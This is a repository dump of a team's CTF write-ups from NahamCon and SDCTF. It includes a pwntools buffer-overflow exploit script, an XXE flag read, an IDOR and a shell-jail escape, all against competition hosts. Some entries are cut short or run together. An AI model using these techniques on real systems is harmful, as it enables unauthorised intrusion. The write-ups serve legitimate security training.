6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: Steam Locomotive
10 | tags: "misc, legend"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | In this challenge we were provided with a ssh credentials to get the flag, with a hint that ls command was getting mistyped accidentally.
19 |
20 | When I connect to the ssh it was playing an animation of steam engine, `sl` command which is Steam Locomotive, and then when the animation was over then immediately the session was getting disconnected.
21 |
22 | 
23 |
24 | To retrieve the flag we needed to read the flag and since ssh allows direct command execution during connection we can read the flag using that.
25 |
26 | 
--------------------------------------------------------------------------------
/nahamcon_2022/misc/Tobeandnottobe.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | To be and not to be Writeup
4 | desc: Check out our writeup for To be and not to be for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: misc
9 | challenge: To be and not to be
10 | tags: "misc, twh"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 | This challenge excepts only alphabets and character length is 3
19 |
20 | Found the solution here :
21 |
22 | ```
23 | https://github.com/freeCodeCamp/freeCodeCamp/issues/11763
24 | ```
25 |
26 | 
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2022/mobile.md:
--------------------------------------------------------------------------------
1 | # mobile
2 |
3 | ## Mobilize
4 | > Solved by: Legend
5 |
6 | In this challenge an andorid APK was given.
7 |
8 | Initially I installed the apk on android vritual device to check what’s the app is about and to know what’s happening with the app. But there was nothing informative.
9 |
10 | 
11 |
12 | Then with the help of apktool I decompiled the apk to see what’s the functioning of the app and also to look for flag string. Their were lot’s of sub-directories so I juse used grep to see if the flag might be present in plain text, and got the flag.
13 |
14 | 
--------------------------------------------------------------------------------
/nahamcon_2022/mobile/Mobilize.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Mobilize Writeup
4 | desc: Check out our writeup for Mobilize for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: mobile
9 | challenge: Mobilize
10 | tags: "mobile, legend, android"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 | In this challenge an andorid APK was given.
19 |
20 | Initially I installed the apk on android vritual device to check what’s the app is about and to know what’s happening with the app. But there was nothing informative.
21 |
22 | 
23 |
24 | Then with the help of apktool I decompiled the apk to see what’s the functioning of the app and also to look for flag string. Their were lot’s of sub-directories so I just used grep to see if the flag might be present in plain text, and got the flag.
25 |
26 | 
--------------------------------------------------------------------------------
/nahamcon_2022/pwn.md:
--------------------------------------------------------------------------------
1 | # pwn
2 |
3 | ## Babiersteps
4 | > Solved By : thewhiteh4t
5 |
6 | ```python
7 | #!/usr/bin/env python3
8 |
9 | from pwn import *
10 |
11 | host = 'challenge.nahamcon.com'
12 | port = 32628
13 |
14 | offset = 120
15 | junk = b'A' * offset
16 | win_addr = 0x4011c9
17 |
18 | le_win_addr = p64(win_addr, endianness='little')
19 | payload = junk + le_win_addr
20 |
21 | conn = remote(host, port)
22 | conn.recv(1024)
23 | conn.sendline(payload)
24 | conn.interactive()
25 | conn.close()
26 | ```
27 |
28 | 
--------------------------------------------------------------------------------
/nahamcon_2022/pwn/Babiersteps.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Babiersteps Writeup
4 | desc: Check out our writeup for Babiersteps for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: pwn
9 | challenge: Babiersteps
10 | tags: "pwn, twh, python"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | ```python
19 | #!/usr/bin/env python3
20 |
21 | from pwn import *
22 |
23 | host = 'challenge.nahamcon.com'
24 | port = 32628
25 |
26 | offset = 120
27 | junk = b'A' * offset
28 | win_addr = 0x4011c9
29 |
30 | le_win_addr = p64(win_addr, endianness='little')
31 | payload = junk + le_win_addr
32 |
33 | conn = remote(host, port)
34 | conn.recv(1024)
35 | conn.sendline(payload)
36 | conn.interactive()
37 | conn.close()
38 | ```
39 |
40 | 
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/crashoverride.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | crash override Writeup
4 | desc: Check out our writeup for crash override for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: crash override
10 | tags: "warmup, twh"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > solved by : thewhiteh4t
17 |
18 | Basic buffer overflow challenge. In the c code we can see that buffer size is 2048, I just sent 2060 “A” and got the flag
19 |
20 | 
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/exitvim.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | exit vim Writeup
4 | desc: Check out our writeup for exit vim for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: exit vim
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | ctrl+c , semi-colon(type :), q char, enter
21 |
22 | 
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/flagcat.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | flagcat Writeup
4 | desc: Check out our writeup for flagcat for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: flagcat
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/prisoner.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | prisoner Writeup
4 | desc: Check out our writeup for prisoner for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: prisoner
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | ctrl+d to escape the python like shell
19 |
20 | 
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2022/warmups/wizard.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | wizard Writeup
4 | desc: Check out our writeup for wizard for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: warmups
9 | challenge: wizard
10 | tags: "warmup, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | 
21 |
22 | Used CyberChef and python to decode the strings
23 |
24 |
--------------------------------------------------------------------------------
/nahamcon_2022/web/EXtravagant.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | EXtravagant Writeup
4 | desc: Check out our writeup for EXtravagant for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: web
9 | challenge: EXtravagant
10 | tags: "web, nigamelastic, xxe"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved By : nigamelastic
18 | 
19 |
20 | The challenge mentions the following:
21 |
22 | ```
23 | The flag is in /var/www
24 | ```
25 |
26 | on accessing the website we see a normal interface with xml parsing as a service
27 |
28 | 
29 |
30 | from the mentioning of XML it seems that this might be an XXE
31 |
32 | Since we already know the location of the flag I used the following payload:
33 |
34 | 
35 |
36 | I simply uploaded it to the trial tab:
37 |
38 | 
39 |
40 | 
41 |
42 | and then used view XML tab to view my xml
43 |
44 | 
45 |
46 | This would give flag
47 |
48 | 
49 |
50 |
--------------------------------------------------------------------------------
/nahamcon_2022/web/JurrassicPark.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2022 | Jurrassic Park Writeup
4 | desc: Check out our writeup for Jurrassic Park for Nahamcon 2022 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2022
7 | parent: nahamcon_2022
8 | category: web
9 | challenge: Jurrassic Park
10 | tags: "web, starry"
11 | date: 2022-05-03T00:00:00+00:00
12 | last_modified_at: 2022-05-03T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | This easy challenge made me (finally) realise John Hammond has the same name as the Owner of the Jurrassic Park in the first movies.
19 |
20 | Pretty cool site by the way:
21 |
22 | 
23 |
24 | 
25 |
26 | content of /robots.txt
27 |
28 | ```
29 | User-agent: *
30 | Disallow: /ingen/
31 | ```
32 |
33 | The flag was here http://challenge.nahamcon.com/ingen/flag.txt
34 |
35 |
--------------------------------------------------------------------------------
/nahamcon_2024/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2024
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Cryptography](crypto.md)
8 | * [Forensics](forensics.md)
9 | * [Misc](misc.md)
10 | * [Mobile](mobile.md)
11 | * [Rev](re.md)
12 | * [Scripting](scripting.md)
13 | * [Warmups](warmups.md)
14 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2024/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2024
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | ---
--------------------------------------------------------------------------------
/nahamcon_2024/scripting/Base3200.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Base3200 Writeup
4 | desc: Check out our writeup for Base3200 for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: scripting
9 | challenge: Base3200
10 | tags: "scripting, legend, python"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Legend
17 |
18 |
19 | - We are given `theflag.xz` file which is used for high compression.
20 |
21 |
22 | - The compressed file contains a file named `theflag` which contains a very long encoded string.
23 |
24 |
25 | - At first I thought it was just `base64` with very long string but it was not getting decoded.
26 |
27 |
28 | - I googled and found past CTF on this.
29 | - http://dann.com.br/3dsctf-2016-misc100-base3200/ → Script didn’t work
30 | - https://ctf-writeup.blogspot.com/2016/12/3ds-ctf.html → Script worked
31 |
32 |
33 | - Basically what is happening here is we are dividing `3200` with `64` because the data is encoded `50` times.
34 |
35 | ```python
36 | import base64
37 |
38 | file = open('theflag.txt', 'r')
39 | file_data = file.read()
40 |
41 | for i in range (50):
42 | file_data = base64.b64decode(file_data)
43 |
44 | flag = file_data.decode('utf-8')
45 | print(f'Flag: {flag}')
46 | ```
47 |
48 | ```
49 | Flag: flag{340ff1bee05244546c91dea53fba7642}
50 | ```
51 |
52 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/QRRRRRRRR.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | QRRRRRRRR Writeup
4 | desc: Check out our writeup for QRRRRRRRR for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: QRRRRRRRR
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - A long QR code
20 | - this is called rMQR code
21 | - https://www.qrcode.com/en/codes/rmqr.html
22 | - this can be read using `scandit` app available on android playstore
23 |
24 | ```
25 | flag{a44557e380e3baae9c21c738664c6142}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Readtherules.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Read the rules Writeup
4 | desc: Check out our writeup for Read the rules for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: Read the rules
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - flag is present in HTML comment
21 |
22 |
23 | 
24 |
25 |
26 | ```
27 | flag{90bc54705794a62015369fd8e86e557b}
28 | ```
29 |
30 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Thatsnotmybase.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | That’s not my base Writeup
4 | desc: Check out our writeup for That’s not my base for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: That’s not my base
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - encoded string :
21 |
22 | ```
23 | F#S Solved by : thewhiteh4t
19 |
20 | - An image is provided
21 | - flag is in the strings of the image
22 |
23 |
24 | 
25 |
26 |
27 | ```
28 | flag{4ac54e3ba5f8f09049f3ad62403abb25}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/Uriel.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Uriel Writeup
4 | desc: Check out our writeup for Uriel for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: Uriel
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - We are given a string which is encoded. And hint is also given that it is encoded twice.
21 |
22 | ```
23 | %25%36%36%25%36%63%25%36%31%25%36%37%25%37%62%25%33%38%25%36%35%25%36%36%25%36%35%25%36%32%25%33%36%25%33%36%25%36%31%25%33%37%25%33%31%25%33%39%25%36%32%25%33%37%25%33%35%25%36%31%25%33%34%25%36%32%25%33%37%25%36%33%25%33%36%25%33%33%25%33%34%25%36%34%25%33%38%25%33%38%25%33%35%25%33%37%25%33%38%25%33%38%25%36%34%25%36%36%25%36%33%25%37%64
24 | ```
25 |
26 | - This is an URL encoded string which gives the flag after decoding it twice.
27 |
28 | ```
29 | flag{8efeb66a719b75a4b7c634d885788dfc}
30 | ```
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/copypasta.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | copypasta Writeup
4 | desc: Check out our writeup for copypasta for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: copypasta
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 |
20 | - The flag is hidden in the text printed by the challenge
21 | - simply copy paste the text in the terminal and we get the flag
22 |
23 |
24 | 
25 |
26 |
27 | ```
28 | flag{1f68e019b29650f6e8ea15a7808f76fd}
29 | ```
30 |
31 |
--------------------------------------------------------------------------------
/nahamcon_2024/warmup/eicar.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | eicar Writeup
4 | desc: Check out our writeup for eicar for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: warmup
9 | challenge: eicar
10 | tags: "warmup, twh"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by : thewhiteh4t
18 |
19 | ```
20 | > md5sum eicar
21 | 44d88612fea8a8f36de82e1278abb02f eicar
22 | ```
23 |
24 | ```
25 | flag{44d88612fea8a8f36de82e1278abb02f}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/AllAboutRobots.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | All About Robots Writeup
4 | desc: Check out our writeup for All About Robots for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: All About Robots
10 | tags: "web, legend"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - This challenge is clear with name that we need to check `robots.txt` file. Even the homepage contained images showing `robots`.
21 | 
22 |
23 | - So first thing I visited the file and got one `Disallow` path.
24 | 
25 |
26 | - After visiting `/open_the_pod_bay_doors_hal_and_give_me_the_flag.html`, I got the flag.
27 | 
28 |
29 | ```
30 | flag{3f19b983c1de42bd49af1a237d7e57b9}
31 | ```
32 |
33 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/HelpfulDesk.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | Helpful Desk Writeup
4 | desc: Check out our writeup for Helpful Desk for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: Helpful Desk
10 | tags: "web, twh, dotnet, ilspy"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : thewhiteh4t
17 |
18 |
19 | - In this challenge security bulletin shows 3 versions of the application
20 | - v1.2 shows critical status
21 | - After downloading both updates we can use `diff` to check which files were updated
22 |
23 | ```
24 | diff -bur v1_1 v1_2
25 | ```
26 |
27 | 
28 |
29 | - Using Avalonia ILSpy we can decompile the DLL file and inspect different functions
30 | - `SetupController` contains some interesting code and it shows a URL path
31 |
32 |
33 | 
34 |
35 | - On visiting this page we can actually set admin credentials!
36 |
37 |
38 | 
39 |
40 | - After setting credentials we can login and inspect services to get the flag
41 |
42 |
43 | 
44 |
45 |
--------------------------------------------------------------------------------
/nahamcon_2024/web/iDoor.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2024 | iDoor Writeup
4 | desc: Check out our writeup for iDoor for Nahamcon 2024 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2024
7 | parent: nahamcon_2024
8 | category: web
9 | challenge: iDoor
10 | tags: "web, legend, idor"
11 | date: 2024-05-28T00:00:00+00:00
12 | last_modified_at: 2024-05-28T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | > Solved by: Legend
18 |
19 |
20 | - This one also is very clear with the name that we need to find the IDOR. And the challenge description has given the hint that they are using `SHA256` algorithm to create the reference objects.
21 |
22 |
23 | 
24 |
25 | - We are a customer with `ID: 11` and reference id is `4fc82b26aecb47d2868c4efbe3581732a3e7cbcc6c2efb32062c08170a05eeb8`
26 |
27 |
28 | - I confirmed that `11`'s refence object will give the same hash if encoded with `SHA256` or not. We can use `openssl` or any other relevant tool.
29 | 
30 |
31 | - The hash was same so I started with `0` and replaced my hash with new one.
32 | 
33 |
34 | - Using `0` only gave us the hash `5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9` which got us the flag.
35 | 
36 |
37 | ```
38 | flag{770a058a80a9bca0a87c3e2ebe1ee9b2}
39 | ```
40 |
41 |
--------------------------------------------------------------------------------
/nahamcon_2025/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2025
2 |
3 | 
4 |
5 | ## WriteUps
6 |
7 | We have added all the challenges we were able to solve, this is not a complete list.
8 |
9 | * [Cryptography](crypto.md)
10 | * [DevOps](devops.md)
11 | * [Malware](malware.md)
12 | * [Misc](misc.md)
13 | * [OSINT](osint.md)
14 | * [The Mission](TheMission.md)
15 | * [Warmups](warmups.md)
16 | * [Web](web.md)
17 |
--------------------------------------------------------------------------------
/nahamcon_2025/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | Nahamcon 2025
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can
5 | discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in
6 | your journey with amazing people from all over the world."
7 | image: images/twc_og_banner.jpg
8 | ctf: Nahamcon 2025
9 | ---
--------------------------------------------------------------------------------
/nahamcon_2025/nahamcon_2025_twc_cert-min.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thewhitecircle/ctf_writeups/28b263d522098954f59d1f075283320cf70d8131/nahamcon_2025/nahamcon_2025_twc_cert-min.png
--------------------------------------------------------------------------------
/sdctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # SDCTF 2021
2 |
3 | 
4 |
5 | ## WriteUps
6 |
7 | We have added all the challenges we were able to solve, this is not a complete list.
8 |
9 | * [OSINT](osint.md)
10 | * [Web](web.md)
11 | * [Cryptography](crypto.md)
12 | * [Reverse Engineering](re.md)
13 | * [Pwn](pwn.md)
14 | * [Misc](misc.md)
--------------------------------------------------------------------------------
/sdctf_2021/crypto/Lostintransmission.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Lost in transmission Writeup
4 | desc: Check out our writeup for Lost in transmission for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: crypto
9 | challenge: Lost in transmission
10 | tags: "crypto, starry"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by : Starry-Lord
17 |
18 | * We get a flag.dat file with gibberish inside.
19 | * Rotating 1 right showed the flag.
20 |
21 | 
22 |
23 |
--------------------------------------------------------------------------------
/sdctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | SDCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | ---
--------------------------------------------------------------------------------
/sdctf_2021/misc/Noflagforyou.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | No flag for you Writeup
4 | desc: Check out our writeup for No flag for you for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: misc
9 | challenge: No flag for you
10 | tags: "misc, taz, jail, escape"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Taz
17 |
18 | * We found out that `ls`, `cat`, `echo` commands were available.
19 | * So started looking around for these.
20 | * Found a way to list dir using echo:
21 |
22 | ```
23 | echo /*
24 | ```
25 |
26 | 
27 |
28 | * started looking around for the flag and found it in the `/home/user/run/opt` dir
29 |
30 | ```
31 | echo /home/user/run/opt/*
32 | ```
33 |
34 | * Did some research on ways to read a file using echo, and got something.
35 | * Reference link: https://stackoverflow.com/questions/22377792/how-to-use-echo-command-to-print-out-content-of-a-text-file
36 |
37 | ```
38 | echo "$( Solved By : Taz
17 |
18 | * searched: UCSD faculty CSE ( https://cse.ucsd.edu/faculty-research )
19 | * UCSD faculty mathematics ( https://www.math.ucsd.edu/people/faculty/ )
20 | * in the CSE got into Algorithm, cryptography etc as it’s most linked to math and got
21 | : https://cstheory.ucsd.edu/faculty.html
22 |
23 | * now looked for the common name in both and came across this profile:
24 | https://www.math.ucsd.edu/people/profiles/daniel-kane/
25 |
26 | * Description here confirmed our target.
27 |
28 | **FLAG**: `Daniel Kane`
29 |
30 |
--------------------------------------------------------------------------------
/sdctf_2021/osint/SpeedStudying2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | Speed-Studying 2 Writeup
4 | desc: Check out our writeup for Speed-Studying 2 for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: Speed-Studying 2
10 | tags: "osint, ava"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Ava
17 |
18 | * Simply googling for `skyline problem ucsd`
19 | * we get this link for PDF :
20 | https://cseweb.ucsd.edu/~dakane/CSE101%20Problem%20Archive/F18/Homework3.pdf
21 |
22 | * at the bottom we have our flag
23 |
24 | ```
25 | sdctf{N1ce_d0rKiNG_C@pt41N}
26 | ```
--------------------------------------------------------------------------------
/sdctf_2021/osint/Thisflaghasbeenstolen.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | This flag has been stolen Writeup
4 | desc: Check out our writeup for This flag has been stolen for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: This flag has been stolen
10 | tags: "osint, nigamelastic"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : nigamelastic
17 |
18 | * the flag is here : https://web.archive.org/web/20210130094941/https://sdc.tf/
19 |
20 |
--------------------------------------------------------------------------------
/sdctf_2021/osint/hIDeandseek.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | hIDe and seek Writeup
4 | desc: Check out our writeup for hIDe and seek for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: osint
9 | challenge: hIDe and seek
10 | tags: "osint, taz"
11 | date: 2021-05-10T00:00:00+00:00
12 | last_modified_at: 2021-05-10T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Taz
17 |
18 | * we are given two locations :
19 | ```
20 | First : ?v=hqXOIZtRYZU
21 | ```
22 | * it looks like part of a youtube link
23 | * link: https://www.youtube.com/watch?v=hqXOIZtRYZU
24 | * here he dictates the 1st part of the flag.
25 | ```
26 | Second : qFHIm0c.jpeg
27 | ```
28 | * it’s an image so I first looked into the most used online image sharing platform **imgur**
29 | * Link: https://i.imgur.com/qFHIm0c.jpeg
30 | * here we have the 2nd part of the flag.
31 | ```
32 | sdctf{W0w_1_h4D_n0_ID3a!}
33 | ```
34 |
35 |
--------------------------------------------------------------------------------
/sdctf_2021/web/GETSRequest.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Sdctf 2021 | GETS Request Writeup
4 | desc: Check out our writeup for GETS Request for Sdctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Sdctf 2021
7 | parent: sdctf_2021
8 | category: web
9 | challenge: GETS Request
